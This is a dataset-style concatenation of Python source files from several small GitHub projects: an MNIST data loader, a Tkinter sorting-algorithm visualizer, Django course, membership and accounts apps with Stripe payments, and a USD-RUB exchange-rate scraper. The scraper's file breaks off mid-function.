        monitor_evaluation_accuracy=True,
        monitor_evaluation_cost=True,
        monitor_training_accuracy=True,
        monitor_training_cost=True)
|
{"/neural_network.py": ["/mnist_loader.py"]}
|
27,972
|
erikbenton/neural_network_practice
|
refs/heads/master
|
/mnist_loader.py
|
import pickle
import gzip
import numpy as np
def load_data():
    """Return the MNIST data as (training_data, validation_data, test_data).

    training_data is a 2-tuple: a 50,000-entry ndarray whose entries are
    784-value ndarrays (flattened 28x28 pixel images), and a 50,000-entry
    ndarray of the corresponding digit labels (0..9). validation_data and
    test_data have the same layout with 10,000 images each.

    This format is awkward for backwards_propagation, so
    load_data_wrapper() below reshapes it.
    """
    # 'latin1' is required to unpickle this Python 2-era dataset under Python 3.
    f = gzip.open('mnist.pkl.gz', 'rb')
    training_data, validation_data, test_data = pickle.load(f, encoding='latin1')
    f.close()
    return training_data, validation_data, test_data
def load_data_wrapper():
    """Return (training_data, validation_data, test_data) in training format.

    training_data is a list of 50,000 2-tuples (x, y):
      x - (784, 1) ndarray holding the input image as a column vector
      y - (10, 1) one-hot ndarray encoding the correct digit
    validation_data and test_data pair the (784, 1) inputs with plain
    integer labels instead of one-hot vectors.
    """
    tr_d, va_d, te_d = load_data()
    # Reshape every image into a column vector.
    training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]
    # One-hot encode training labels only; eval sets keep integer labels.
    training_results = [vectorized_result(y) for y in tr_d[1]]
    training_data = list(zip(training_inputs, training_results))
    validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]
    validation_data = list(zip(validation_inputs, va_d[1]))
    test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]
    test_data = list(zip(test_inputs, te_d[1]))
    return training_data, validation_data, test_data
def vectorized_result(j):
    """Return a 10-dimensional one-hot column vector with 1.0 at index *j*."""
    one_hot = np.zeros((10, 1))
    one_hot[j] = 1.0
    return one_hot
|
{"/neural_network.py": ["/mnist_loader.py"]}
|
27,973
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/InsertionSort.py
|
import time
def insertion_sort(data, drawData, tick):
    """In-place insertion sort, redrawing after every swap.

    drawData(data, colors) renders the current state; tick is the frame delay.
    """
    for end in range(1, len(data)):
        pos = end
        while pos > 0 and data[pos] < data[pos - 1]:
            # Highlight the pair about to be swapped in red.
            drawData(data, ['red' if k == pos or k == pos + 1 else 'gray'
                            for k in range(len(data))])
            time.sleep(tick)
            data[pos], data[pos - 1] = data[pos - 1], data[pos]
            pos -= 1
        # Mark the sorted prefix white after placing each element.
        drawData(data, ['white' if k < end else 'gray'
                        for k in range(len(data))])
        time.sleep(tick)
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,974
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/MergeSort.py
|
import time
def merge_sort(data, drawData, tick):
    """Entry point: merge-sort *data* in place, animating via drawData."""
    return merge_sort_alg(data, 0, len(data) - 1, drawData, tick)


def merge_sort_alg(data, left, right, drawData, tick):
    """Recursively sort data[left..right] (inclusive bounds)."""
    if left < right:
        middle = (left + right) // 2
        merge_sort_alg(data, left, middle, drawData, tick)
        merge_sort_alg(data, middle + 1, right, drawData, tick)
        merge(data, left, middle, right, drawData, tick)


def merge(data, left, middle, right, drawData, tick):
    """Merge the sorted runs data[left..middle] and data[middle+1..right]."""
    drawData(data, getColorArr(len(data), left, middle, right))
    time.sleep(tick)
    # Bug fix: the left run starts at `left`, not at 0. Slicing from 0
    # pulled in elements from before the current window and corrupted the
    # sort whenever left > 0.
    leftSide = data[left: middle + 1]
    rightSide = data[middle + 1: right + 1]
    leftIndex = rightIndex = 0
    for dataIndex in range(left, right + 1):
        if (leftIndex < len(leftSide) and rightIndex < len(rightSide)):
            # Take the smaller head; <= keeps the merge stable.
            if leftSide[leftIndex] <= rightSide[rightIndex]:
                data[dataIndex] = leftSide[leftIndex]
                leftIndex += 1
            else:
                data[dataIndex] = rightSide[rightIndex]
                rightIndex += 1
        elif leftIndex < len(leftSide):
            # Right run exhausted: copy the rest of the left run.
            data[dataIndex] = leftSide[leftIndex]
            leftIndex += 1
        else:
            # Left run exhausted: copy the rest of the right run.
            data[dataIndex] = rightSide[rightIndex]
            rightIndex += 1
    drawData(data, ['green' if x >= left and x <= right else 'white'
                    for x in range(len(data))])
    time.sleep(tick)


def getColorArr(length, left, middle, right):
    """Color map for the merge window: left run Yellow, right run Pink."""
    colorArr = []
    for i in range(length):
        if i >= left and i <= right:
            if i >= left and i <= middle:
                colorArr.append('Yellow')
            else:
                colorArr.append('Pink')
        else:
            colorArr.append('White')
    return colorArr
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,975
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/SelectionSort.py
|
import time
def selection_sort(data, drawData, tick):
    """In-place selection sort, animating minimum candidates and swaps.

    drawData(data, colors) renders the current state; tick is the frame delay.
    """
    size = len(data)
    for boundary in range(size - 1):
        min_pos = boundary
        for probe in range(boundary + 1, size):
            if data[probe] < data[min_pos]:
                # Flag the current minimum in blue before updating it.
                drawData(data, ['blue' if k == min_pos else 'gray'
                                for k in range(size)])
                time.sleep(tick)
                min_pos = probe
        # Show the swap pair in green, then place the minimum.
        drawData(data, ['green' if k == boundary or k == min_pos else 'gray'
                        for k in range(size)])
        time.sleep(tick)
        data[boundary], data[min_pos] = data[min_pos], data[boundary]
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,976
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/QuickSort.py
|
import time
def Partition(data, left, right, drawData, tick):
    """Lomuto partition around pivot data[right]; return the pivot's final index."""
    i = (left-1)  # index of smaller element
    pivot = data[right]  # pivot
    drawData(data, getColorArray(len(data), left, right, i, i))
    for j in range(left, right):
        if data[j] <= pivot:
            drawData(data, getColorArray(len(data), left, right, i, j, True))
            time.sleep(tick)
            i = i+1
            data[i], data[j] = data[j], data[i]
            drawData(data, getColorArray(len(data), left, right, i, j))
            time.sleep(tick)
    drawData(data, getColorArray(len(data), left, right, i, right, True))
    time.sleep(tick)
    # Bug fix: this must SWAP the pivot into position. The original assigned
    # data[right] to both slots, duplicating the pivot and losing data[i+1].
    data[i+1], data[right] = data[right], data[i+1]
    return (i+1)


def quick_sort(data, left, right, drawData, tick):
    """Recursively quick-sort data[left..right] in place."""
    if(left < right):
        partition = Partition(data, left, right, drawData, tick)
        # Bug fix: exclude the pivot (now fixed at index `partition`) from the
        # left recursion; recursing on [left, partition] never terminated.
        quick_sort(data, left, partition - 1, drawData, tick)
        ##right partition
        quick_sort(data, partition + 1, right, drawData, tick)


def getColorArray(dataLen, head, tail, border, curr, isSwapping=False):
    """Color map: gray window, blue pivot, red border, yellow current, green swap pair."""
    colorArray = []
    for i in range(dataLen):
        # base coloring
        if i >= head and i <= tail:
            colorArray.append('gray')
        else:
            colorArray.append('white')
        if(i == tail):
            colorArray[i] = 'blue'
        elif(i == border):
            colorArray[i] = 'red'
        elif(i == curr):
            colorArray[i] = 'yellow'
        if (isSwapping):
            if(i == border or i == curr):
                colorArray[i] = 'green'
    return colorArray
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,977
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/sortingAlgos.py
|
from tkinter import *
from tkinter import ttk
import random
from BubbleSort import bubble_sort
from SelectionSort import selection_sort
from InsertionSort import insertion_sort
from MergeSort import merge_sort
from QuickSort import quick_sort
# Root Tk window for the visualizer: fixed maximum size, black background.
window= Tk()
window.title('Sorting Algorithms Visualized')
window.maxsize(900, 600)
window.config(bg='black')
#Variables
selected_alg= StringVar()  # algorithm name chosen in the combobox
data=[]  # the list currently being visualized / sorted
#frame and base layout
def drawData(data, colorArr):
    """Redraw the canvas: one bar per element, colored by colorArr[i].

    Bar heights are normalized against max(data) -- assumes data is
    non-empty and max(data) > 0; TODO confirm callers guarantee this.
    """
    canvas.delete('all')
    c_width=600
    c_height=380
    x_width=c_width / (len(data) + 1)  # width allotted per bar
    offset=30
    spacing=10
    normalizedData= [i / max(data) for i in data]
    for i, height in enumerate(normalizedData):
        # bar corners: x grows with index, y is measured down from the top
        x0 =i * x_width + offset + spacing
        y0=c_height-height * 340
        x1= (i+1) * x_width + offset
        y1=c_height
        canvas.create_rectangle(x0, y0, x1, y1, fill= colorArr[i])
        canvas.create_text(x0 + 2, y0, anchor=SW, text= str(data[i]))
    window.update_idletasks()
def Generate():
    """Fill the global `data` with `size` random ints in [minVal, maxVal] and draw them."""
    global data
    print('Alg Selected: ' + selected_alg.get())
    minVal=int(minEntry.get())
    maxVal=int(maxEntry.get())
    size=int(sizeEntry.get())
    data=[]
    for _ in range(size):
        # randrange upper bound is exclusive, so +1 makes maxVal inclusive
        data.append(random.randrange(minVal, maxVal+1))
    drawData(data, ['blue' for x in range(len(data))])
def StartAlgorithm():
    """Run the algorithm selected in the combobox on the current `data`."""
    global data
    print("Starting Algorithm...")
    if(algmenu.get() == 'Quick Sort'):
        quick_sort(data, 0, len(data)-1, drawData, speedScale.get())
        # extra green repaint for Quick Sort (it has no final pass of its own)
        drawData(data, ['green' for x in range(len(data))])
    elif(algmenu.get()=='Bubble Sort'):
        bubble_sort(data, drawData, speedScale.get())
    elif(algmenu.get()=='Selection Sort'):
        selection_sort(data, drawData, speedScale.get())
    elif(algmenu.get() == 'Insertion Sort'):
        insertion_sort(data, drawData, speedScale.get())
    elif(algmenu.get() == 'Merge Sort'):
        merge_sort(data, drawData, speedScale.get())
    # final repaint in green once sorting has finished
    drawData(data, ['green' for x in range(len(data))])
# Control panel (top) and drawing canvas (bottom).
UI_frame=Frame(window, width=600, height=200, bg='grey')
UI_frame.grid(row=0, column=0, padx=10, pady=5)
canvas= Canvas(window, width=600, height=380)
canvas.grid(row=1, column=0, padx=10, pady=5)
#UI Section
# Row 0: algorithm picker, speed slider, Start button.
Label(UI_frame, text="Algorithm: ", bg='grey').grid(row=0, column=0, padx=5, pady=5, sticky=W)
algmenu= ttk.Combobox(UI_frame, textvariable=selected_alg, values=['Selection Sort', 'Bubble Sort', 'Insertion Sort', 'Merge Sort', 'Quick Sort'])
algmenu.grid(row=0, column=1, padx=5, pady=5)
algmenu.current(0)
speedScale= Scale(UI_frame, from_=.1, to=2.0, length=200, digits=2, resolution=.2, orient=HORIZONTAL, label="Select Speed[s]")
speedScale.grid(row=0, column=2, padx=5, pady=5)
Button(UI_frame, text="Start", command=StartAlgorithm, bg='Blue').grid(row=0, column=3, padx=5, pady=5, sticky=W)
# Row 1: data-generation controls (size and value range) and Generate button.
sizeEntry= Scale(UI_frame, from_=3, to=25, length=200, resolution=1, orient=HORIZONTAL, label="Data Size")
sizeEntry.grid(row=1, column=0, padx=5, pady=5, sticky=W)
minEntry= Scale(UI_frame, from_=0, to=10, length=200, resolution=1, orient=HORIZONTAL, label="Min Value")
minEntry.grid(row=1, column=1, padx=5, pady=5, sticky=W)
maxEntry= Scale(UI_frame, from_=10, to=100, length=200, resolution=1, orient=HORIZONTAL, label="Max Value")
maxEntry.grid(row=1, column=2, padx=5, pady=5, sticky=W)
Button(UI_frame, text="Generate", command=Generate, bg='White').grid(row=1, column=3, padx=5, pady=5, sticky=W)
window.mainloop()
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,978
|
cahalls3/sneaky-head-1
|
refs/heads/main
|
/sneakyhead/pages/urls.py
|
from django.urls import path
from .views import indexPageView, loginPageView, homePageView, profilePageView
# URL routes for the pages app; `name` values are used for reverse lookups.
urlpatterns = [
    path("", indexPageView, name="index"),
    path("login/", loginPageView, name="login"),
    path("home/", homePageView, name="home"),
    path("profile/", profilePageView, name="profile")
]
|
{"/sneakyhead/pages/urls.py": ["/sneakyhead/pages/views.py"]}
|
27,979
|
cahalls3/sneaky-head-1
|
refs/heads/main
|
/sneakyhead/pages/views.py
|
from django.http import HttpResponse
# displays either login page or user home page depending on if user is logged in
def indexPageView(request):
    """Entry page: intended to show either the login page or the user's home
    page depending on auth state; currently a static placeholder."""
    return HttpResponse('Index Page')
# displays form to login or create profile
def loginPageView(request):
    """Login / profile-creation form (placeholder response for now)."""
    return HttpResponse('Login Page')
# displays posts from other people
def homePageView(request):
    """Display posts from other people (placeholder response for now).

    CONSISTENCY FIX: parameter renamed from `requests` to `request` to match
    the other views; Django passes the request positionally, so callers are
    unaffected.
    """
    return HttpResponse('Home Page')
# displays all posts by user and provides a place for the user to share, update,
# and delete posts
def profilePageView(request):
    """The user's own posts, with share/update/delete (placeholder response for now)."""
    return HttpResponse('Profile Page')
|
{"/sneakyhead/pages/urls.py": ["/sneakyhead/pages/views.py"]}
|
27,982
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/courses/admin.py
|
from django.contrib import admin
from .models import Course, Lesson
#admin.site.register(Course)
#admin.site.register(Lesson)
class InlineLession(admin.TabularInline):
    """Tabular inline for editing a Course's Lessons on the Course admin page.

    (Keeps the original 'Lession' spelling -- the name is referenced by
    CourseAdmin.inlines below.)
    """
    model = Lesson
    extra = 1    # number of blank extra forms shown
    max_num = 3  # hard cap on inline lesson forms
#@admin.register(Course)
class CourseAdmin(admin.ModelAdmin):
    """Admin page for Course with inline Lesson editing and a computed
    title+slug column in the changelist."""
    inlines = (InlineLession, )
    list_display = ('title', 'slug', 'description','combine_title_and_slug')
    #list_display_links = ('title', 'slug')
    list_editable = ('slug',)
    search_fields = ('title',)
    # fields = (
    # 'slug',
    # 'title',
    # 'description',
    # 'allowed_membership'
    #)
    fieldsets = (
        (None, {
            'fields': (
                'title',
                'slug',
                'description',
                'allowed_membership')
        }),
    )
    def combine_title_and_slug(self, obj):
        # computed column referenced by list_display above
        return '{} - {}'.format(obj.title, obj.slug)
admin.site.register(Course, CourseAdmin)
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,983
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/courses/urls.py
|
from django.urls import path
from .views import CourseListView, CourseDetailView, LessonDetail
app_name = "courses"  # URL namespace used by reverse() / {% url %}
urlpatterns = [
    path('', CourseListView.as_view(), name='list'),
    path('<slug>', CourseDetailView.as_view(), name='detail'),
    #url(r'(P<slug>[\w-]+') same thing as up
    # nested route: both slugs are handed to LessonDetail.get()
    path("<course_slug>/<lesson_slug>", LessonDetail.as_view(), name="lesson_detail")
]
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,984
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/core/managment/commands/rename.py
|
import os
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    help = 'Rename django project'

    def add_arguments(self, parser):
        # BUG FIX: argparse's method is add_argument (singular); the original
        # called parser.add_arguments, which raises AttributeError as soon as
        # the command is invoked.
        parser.add_argument('new_project_name', type=str, help='New project name')

    def handle(self, *args, **kwargs):
        """Replace the old project name inside the key files, then rename the folder."""
        new_project_name=kwargs['new_project_name']
        files_to_rename = ['videoseries/settings/base.py', 'videoseries/wsgi.py', 'manage.py']
        folder_to_rename = 'videoseries'
        old_file_name = 'videoseries'
        for f in files_to_rename:
            # read, substitute, and write back each file in place
            with open(f, 'r') as file:
                filedata = file.read()
            filedata = filedata.replace(old_file_name, new_project_name)
            with open(f, 'w') as file:
                file.write(filedata)
        os.rename(folder_to_rename, new_project_name)
        self.stdout.write(self.style.SUCCESS('Project has been successfuly renamed to %s' % new_project_name))
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,985
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/membership/views.py
|
from django.shortcuts import render, redirect
from django.views.generic import ListView
from .models import Membership, UserMembership, Subcription
from django.contrib import messages
from django.http import HttpResponseRedirect, HttpResponse
from django.urls import reverse
from django.conf import settings
import stripe
def profile_view(request):
    """Render the user's profile with their membership and subscription."""
    user_membership = get_user_membership(request)
    user_subscription = get_user_subscription(request)
    context = {
        'user_membership':user_membership,
        'user_subscription': user_subscription
    }
    return render(request, "membership/profile_view.html", context)
'''
Dohvaća korisnika s svim podacima o svojoj pretplati
'''
def get_user_membership(request):
    """Return the requesting user's UserMembership, or None if they have none."""
    membership_qs = UserMembership.objects.filter(user=request.user)
    return membership_qs.first() if membership_qs.exists() else None
def get_user_subscription(request):
    """Return the Subcription tied to the user's membership, or None."""
    subscription_qs = Subcription.objects.filter(
        user_membership=get_user_membership(request))
    if not subscription_qs.exists():
        return None
    return subscription_qs.first()
def get_selected_membership(request):
    """Look up the Membership matching the type stored in the session, or None."""
    wanted_type = request.session['selected_membership_type']
    membership_qs = Membership.objects.filter(membership_type=wanted_type)
    return membership_qs.first() if membership_qs.exists() else None
'''
Class based view. Za postavljanje contexta se koristi fukcija get_context_data() s takvom sintaksom i vraća dictionary s svim podacima.
U context dalje možemo upisivati podatke kad je dictionary. To je jednako kao u "Function based view" gdje dodajemo context = {} i onda render
'''
class MembershipSelectView(ListView):
    """List the available Memberships and handle the user's selection.

    get_context_data() adds the user's current membership type so the
    template can highlight it; post() validates the chosen membership and
    stashes its type in the session before redirecting to the payment view.
    """
    model = Membership

    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data(**kwargs)
        # Class-based view, so the request lives on self.
        current_membership = get_user_membership(self.request)
        context['current_membership'] = str(current_membership.membership_type)
        return context

    def post(self, request, **kwargs):
        user_membership = get_user_membership(request)
        user_subscription = get_user_subscription(request)
        selected_membership_type = request.POST.get('membership_type')
        selected_membership_qs = Membership.objects.filter(
            membership_type=selected_membership_type)
        # BUG FIX: the original tested `.exists` (the bound method object,
        # always truthy) instead of calling `.exists()`. Guard explicitly so
        # an unknown membership type cannot leave `selected_membership`
        # unbound further down.
        if not selected_membership_qs.exists():
            return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
        selected_membership = selected_membership_qs.first()
        '''
        ==============
        Validation
        ==============
        '''
        # NOTE(review): this compares membership_type against a Membership
        # instance -- possibly intended to compare against
        # selected_membership.membership_type; confirm against the model.
        if user_membership.membership_type == selected_membership:
            if user_subscription != None:
                messages.info(request, "You alredy have this membership \
                Your next paiment is due {}".format('get this value from stripe'))
                # send the user back to where they came from
                return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
        # remember the choice in the session for the payment step
        request.session['selected_membership_type'] = selected_membership.membership_type
        # forward the user to the payment view
        return HttpResponseRedirect(reverse('memberships:payment'))
def PaymentView(request):
    """Charge the selected membership via Stripe.

    GET renders the payment form; POST attaches the submitted card token to
    the Stripe customer, creates the subscription, then redirects to
    update-transactions. Card errors fall through to re-render the form with
    a message.
    """
    user_membership = get_user_membership(request)
    selected_membership = get_selected_membership(request)
    publishKey = settings.STRIPE_PUBLISHABLE_KEY
    if request.method == 'POST':
        try:
            token = request.POST['stripeToken']
            # attach the card token as the customer's payment source
            customer = stripe.Customer.retrieve(user_membership.stripe_customer_id)
            customer.source = token
            customer.save()
            subscription = stripe.Subscription.create(
                customer = user_membership.stripe_customer_id,
                items = [
                    {"plan": selected_membership.stripe_plan_id},
                ]
            )
            return redirect(reverse('memberships:update-transactions', kwargs={
                'subscription_id': subscription.id
            }))
        except stripe.error.CardError as e:
            messages.info(request, e)
    context = {
        'publishKey': publishKey ,
        'selected_membership':selected_membership
    }
    return render(request, "membership/memberships_payment.html", context)
def updateTransactions(request, subscription_id):
    """Record a completed Stripe subscription: update the user's membership
    type and activate (or create) the local Subcription row, then clear the
    selection from the session."""
    user_membership = get_user_membership(request)
    selected_membership = get_selected_membership(request)
    user_membership.membership_type = selected_membership
    user_membership.save()
    sub, created = Subcription.objects.get_or_create(user_membership=user_membership)
    sub.stripe_subscription_id = subscription_id
    sub.active = True
    sub.save()
    # BUG FIX: the original deleted from `requese.session` (typo) and the
    # bare `except: pass` silently swallowed the resulting NameError, so the
    # session key was never cleaned up. Use the real request object and only
    # tolerate the key being absent.
    try:
        del request.session['selected_membership_type']
    except KeyError:
        pass
    messages.info(request, 'successfully created {} membership'.format(selected_membership))
    return redirect('/courses')
def cancelSubscription(request):
    """Cancel the user's active Stripe subscription and drop them to the
    Free membership, then send them back to the referring page."""
    user_sub = get_user_subscription(request)
    if user_sub.active == False:
        messages.info(request, "You don't have an active membership")
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
    # cancel on Stripe's side first, then deactivate the local record
    sub = stripe.Subscription.retrieve(user_sub.stripe_subscription_id)
    sub.delete()
    user_sub.active = False
    user_sub.save()
    free_membership = Membership.objects.filter(membership_type='Free').first()
    user_membership = get_user_membership(request)
    # BUG FIX: the original assigned to `user_membership.membership`, a field
    # no other code in this module uses, so the downgrade never stuck.
    # Assign the Membership to membership_type, matching updateTransactions().
    user_membership.membership_type = free_membership
    user_membership.save()
    messages.info(request, "Successfuly canceled membership")
    #send email here
    return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,986
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/accounts/urls.py
|
from django.urls import path
from .views import loginView, registerView, logoutView

# URL namespace for the accounts app.
app_name = "accounts"

urlpatterns = [
    path('login/', loginView, name='login'),
    path('register/', registerView, name='register'),
    # BUG FIX: the logout route pointed at loginView (and loginView was
    # imported twice; logoutView never was). accounts/views.py defines a
    # dedicated logoutView -- wire it up.
    path('logout/', logoutView, name='logout'),
]
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,987
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/videoseries/urls.py
|
'''Root URL configuration: wires the admin, the app urlconfs, and -- in
DEBUG only -- static/media serving plus the debug toolbar.'''
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from .views import home
from blog.views import blog_list, blog_index
urlpatterns = [
    path('admin/', admin.site.urls),
    path('courses/', include("courses.urls", namespace='courses')),
    path('memberships/', include("membership.urls", namespace='memberships')),
    path('', home),
    path('accounts/', include("accounts.urls", namespace='accounts')),
    path('blog/', blog_list),
    path('blog/index/', blog_index),
]
if settings.DEBUG:
    # development-only: serve static/media files and mount the debug toolbar
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
    import debug_toolbar
    urlpatterns += [path('__debug__/', include(debug_toolbar.urls))]
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,988
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/accounts/views.py
|
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, get_user_model, login, logout
from .forms import UserLoginForm, UserRegisterFrom
from django.contrib.auth.hashers import make_password
def loginView(request):
    """Authenticate and log a user in, then redirect to ?next=... or the root.

    On GET, invalid POST, or bad credentials the login form is (re-)rendered.
    """
    # renamed from `next` (shadowed the builtin); debug print removed
    redirect_to = request.GET.get('next')
    form = UserLoginForm(request.POST or None)
    if form.is_valid():
        username = form.cleaned_data.get('username')
        password = form.cleaned_data.get('password')
        user = authenticate(username=username, password=password)
        # ROBUSTNESS FIX: authenticate() returns None for bad credentials;
        # the original passed that straight to login(), which raises. Fall
        # through and re-render the form instead.
        if user is not None:
            login(request, user)
            if redirect_to:
                return redirect(redirect_to)
            return redirect('/')
    context = {
        'form':form,
    }
    return render(request, 'accounts/login.html', context)
def registerView(request):
    """Create an account from the registration form, hash the password,
    sign the new user in, and redirect to the root. Re-renders the form
    otherwise."""
    form = UserRegisterFrom(request.POST or None)
    if not form.is_valid():
        return render(request, 'accounts/register.html', {'form': form})
    user = form.save(commit=False)
    password = form.cleaned_data.get("password")
    # store the hashed password, never the raw one
    user.password = make_password(form.cleaned_data['password'])
    user.save()
    new_user = authenticate(username=user.username, password=password)
    login(request, new_user)
    return redirect('/')
def logoutView(request):
    """Log the user out and send them to the site root."""
    logout(request)
    # BUG FIX: the original called redirect('/') without returning it, so the
    # view returned None and Django rejects a view that returns no response.
    return redirect('/')
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,989
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/membership/admin.py
|
from django.contrib import admin
from membership.models import Membership, UserMembership, Subcription
from django.conf import settings
# Register your models here.
# Plain registrations: default ModelAdmin for all three membership models.
admin.site.register(Membership)
admin.site.register(UserMembership)
admin.site.register(Subcription)
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,990
|
akapitan/VideoSeries
|
refs/heads/master
|
/videoseries/courses/views.py
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, DetailView, View
from .models import Course
from membership.models import UserMembership
class CourseListView(ListView):
    """Generic list view over all Course objects."""
    model = Course
class CourseDetailView(DetailView):
    """Generic detail view for one Course (looked up by the <slug> URL kwarg)."""
    model = Course
class LessonDetail(View):
    """Show a single lesson, but only when the user's membership type is in
    the course's allowed memberships; otherwise the template gets None."""

    def get(self, request, course_slug, lesson_slug, *args, **kwargs):
        # ROBUSTNESS FIX: initialize context up front -- in the original it
        # was only assigned inside the nested ifs, so a missing course or
        # lesson crashed with an unbound `context` at render time.
        context = {
            'object': None
        }
        #course query set
        course_qs = Course.objects.filter(slug=course_slug)
        if course_qs.exists():
            course = course_qs.first()
            #Lesson query set
            lesson_qs = course.lessons.filter(slug=lesson_slug)
            if lesson_qs.exists():
                # BUG FIX: the original took course_qs.first() here, handing
                # the Course object to the template instead of the Lesson
                # that was just looked up.
                lesson = lesson_qs.first()
                user_membership = UserMembership.objects.filter(user = request.user).first()
                user_membership_type = user_membership.membership_type.membership_type
                course_allowed_mem_types = course.allowed_membership.all()
                if course_allowed_mem_types.filter(membership_type= user_membership_type).exists():
                    context = {'object': lesson}
        return render(request, "courses/lesson_detail.html", context)
|
{"/videoseries/courses/urls.py": ["/videoseries/courses/views.py"], "/videoseries/accounts/urls.py": ["/videoseries/accounts/views.py"]}
|
27,998
|
codelooper75/simple_currency_converter_api
|
refs/heads/main
|
/exchange_rate_parser.py
|
import urllib
from urllib import request
from html.parser import HTMLParser
class Parse(HTMLParser):
    """Scrape the USD->RUB sale rate from the vbr.ru page markup.

    The page embeds the rate as
    <input type="hidden" id="course_3" value="73,7" name="course">;
    feed() stores the parsed float on the CLASS attribute
    usd_rub_exchange_rate (preserving the original's class-level storage).
    """

    usd_rub_exchange_rate = ''  # '' until a rate has been parsed

    def __init__(self):
        #Since Python 3, we need to call the __init__() function of the parent class
        super().__init__()
        self.reset()

    def handle_starttag(self, tag, attrs):
        # Only the hidden <input id="course_3"> carries the rate.
        if tag != "input":
            return
        # GENERALIZED: the original indexed attrs positionally (attrs[1],
        # attrs[2]) and hid every failure behind a bare except, so any other
        # attribute order was silently skipped. A dict lookup works for any
        # order; only a malformed value is tolerated.
        attr = dict(attrs)
        if attr.get('id') == 'course_3' and attr.get('value') is not None:
            try:
                Parse.usd_rub_exchange_rate = float(attr['value'].replace(',', '.'))
            except ValueError:
                pass  # malformed number: keep the previous rate
#resource - https://moskva.vbr.ru/banki/kurs-valut/prodaja-usd/
#target tag - '<input type="hidden" id="course_3" value="73,7" name="course">'
# Module-import side effect: download the page once and parse the current rate.
response = urllib.request.urlopen("https://moskva.vbr.ru/banki/kurs-valut/prodaja-usd/")
html = response.read()
html = html.decode()  # bytes -> str for HTMLParser.feed()
# print(html)
p = Parse()
# html = '<input type="hidden" id="course_3" value="73,7" name="course">'
p.feed(html)
result = p.usd_rub_exchange_rate
print(result)
from html.parser import HTMLParser
def get_exchange_rate():
    """Re-parse the module-level `html` and return the USD->RUB rate.

    NOTE(review): this reuses the page downloaded once at import time -- the
    rate is never refreshed; confirm that is intended.
    """
    p = Parse()
    # html = '<input type="hidden" id="course_3" value="73,7" name="course">'
    p.feed(html)
    result = p.usd_rub_exchange_rate
    return result
|
{"/http_api_currency_exchange.py": ["/exchange_rate_parser.py"]}
|
27,999
|
codelooper75/simple_currency_converter_api
|
refs/heads/main
|
/http_api_currency_exchange.py
|
import http.server
import importlib
import json
import os
import re
import shutil
import sys
import urllib.request
import urllib.parse
import logging
import sys
# LOGGING SETTINGS
# One module logger: INFO+ to api.log, CRITICAL+ to the console.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s')
file_handler = logging.FileHandler('api.log') #logs to file
file_handler.setLevel(logging.INFO) #will allow to include ERROR level event in log
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler() #will log to stdout
stream_handler.setFormatter(formatter)
stream_handler.setLevel(logging.CRITICAL)
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
from exchange_rate_parser import get_exchange_rate
importlib.reload(sys)  # NOTE(review): Python-2-era idiom; likely a no-op here -- confirm it can be dropped
here = os.path.dirname(os.path.realpath(__file__))  # directory of this file
success_response = {}  # NOTE(review): module-level mutable dict mutated by usd_rub(); shared across requests
def service_worker():
